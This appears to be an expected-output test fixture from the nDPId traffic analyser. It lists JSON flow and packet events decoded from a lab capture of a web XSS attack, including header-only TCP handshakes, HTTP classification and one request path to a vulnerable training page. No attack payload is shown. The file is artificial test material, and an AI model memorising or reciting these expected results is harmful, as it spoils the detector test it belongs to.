+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347476667,"flow_last_seen":1499347476667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347476667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1499347476667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347476667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86aJAAD4G3C2sEAABwKgKMuEEAFDYCDFYAAAAAKACchCaGQAAAgQFtAQCCAoBOtj6AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":2,"flow_last_seen":1499347476667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347476667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4QTgdpFp2AgxWaAScSB6wwAAAgQFtAQCCAoD5KpwATrY+gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":3,"flow_last_seen":1499347476667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347476667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06aNAAD4G3DSsEAABwKgKMuEEAFDYCDFZ4HaRaoAQAOUZywAAAQEICgE62PoD5Kpw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347479172,"flow_last_seen":1499347479172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347479172,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1499347479172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347479172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iKNAAD4GPS2sEAABwKgKMuEeAFCusFPOAAAAAKACchCebgAAAgQFtAQCCAoBOtttAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":2,"flow_last_seen":1499347479172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347479172,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4R7s2gFNrrBTz6AScSAAXwAAAgQFtAQCCAoD5KziATrbbQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":3,"flow_last_seen":1499347479173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347479173,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iKRAAD4GPTSsEAABwKgKMuEeAFCusFPP7NoBToAQAOWfZgAAAQEICgE6220D5Kzi"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347480438,"flow_last_seen":1499347480438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347480438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1499347480438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347480438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UJlAAD4GdTesEAABwKgKMuEsAFBzZ4wwAAAAAKACchCgCwAAAgQFtAQCCAoBOtypAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":2,"flow_last_seen":1499347480438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347480438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4SwTIR0Qc2eMMaAScSC+tQAAAgQFtAQCCAoD5K4fATrcqQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":3,"flow_last_seen":1499347480439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347480439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UJpAAD4GdT6sEAABwKgKMuEsAFBzZ4wxEyEdEYAQAOVdvQAAAQEICgE63KkD5K4f"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347481724,"flow_last_seen":1499347481724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347481724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1499347481724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347481724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8fSpAAD4GSKasEAABwKgKMuE6AFDTgqDBAAAAAKACchAqDwAAAgQFtAQCCAoBOt3rAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":2,"flow_last_seen":1499347481724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347481724,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4TowvlKP04KgwqAScSD0WwAAAgQFtAQCCAoD5K9gATrd6wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":3,"flow_last_seen":1499347481725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347481725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0fStAAD4GSK2sEAABwKgKMuE6AFDTgqDCML5SkIAQAOWTYwAAAQEICgE63esD5K9g"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347484263,"flow_last_seen":1499347484263,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347484263,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1499347484263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347484263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UOVAAD4GdOusEAABwKgKMuFUAFABZrCAAAAAAKACchDp2AAAAgQFtAQCCAoBOuBlAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":2,"flow_last_seen":1499347484263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347484263,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4VQEZrkRAWawgaAScSB3gAAAAgQFtAQCCAoD5LHbATrgZQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4310,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":3,"flow_last_seen":1499347484264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347484264,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UOZAAD4GdPKsEAABwKgKMuFUAFABZrCBBGa5EoAQAOUWhwAAAQEICgE64GYD5LHb"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347485533,"flow_last_seen":1499347485533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485533,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1499347485533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaZAAD4GOCqsEAABwKgKMuFiAFALNGwFAAAAAKACchAjOgAAAgQFtAQCCAoBOuGjAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":2,"flow_last_seen":1499347485533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4WJ5n4cfCzRsBqAScSBsXQAAAgQFtAQCCAoD5LMYATrhowEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":3,"flow_last_seen":1499347485534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347485534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jadAAD4GODGsEAABwKgKMuFiAFALNGwGeZ+HIIAQAOULZQAAAQEICgE64aMD5LMY"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347291442,"flow_last_seen":1499347358996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232674,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347486787,"flow_last_seen":1499347486787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347486787,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1499347486787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D7tAAD4GthWsEAABwKgKMuFwAFB2mu1nAAAAAKACchA1KgAAAgQFtAQCCAoBOuLcAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":2,"flow_last_seen":1499347486787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4XA0h5CedprtaKAScSC4rAAAAgQFtAQCCAoD5LRSATri3AEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":3,"flow_last_seen":1499347486787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D7xAAD4GthysEAABwKgKMuFwAFB2mu1oNIeQn4AQAOVXtAAAAQEICgE64twD5LRS"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4344,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347484263,"flow_last_seen":1499347487799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347487799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347489408,"flow_last_seen":1499347489408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347489408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1499347489408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86N5AAD4G3PGsEAABwKgKMuGKAFByXg2yAAAAAKACchAWcgAAAgQFtAQCCAoBOuVsAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":2,"flow_last_seen":1499347489408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4YpoWWpFcl4Ns6AScSCJ7AAAAgQFtAQCCAoD5LbhATrlbAEDAwc="} 
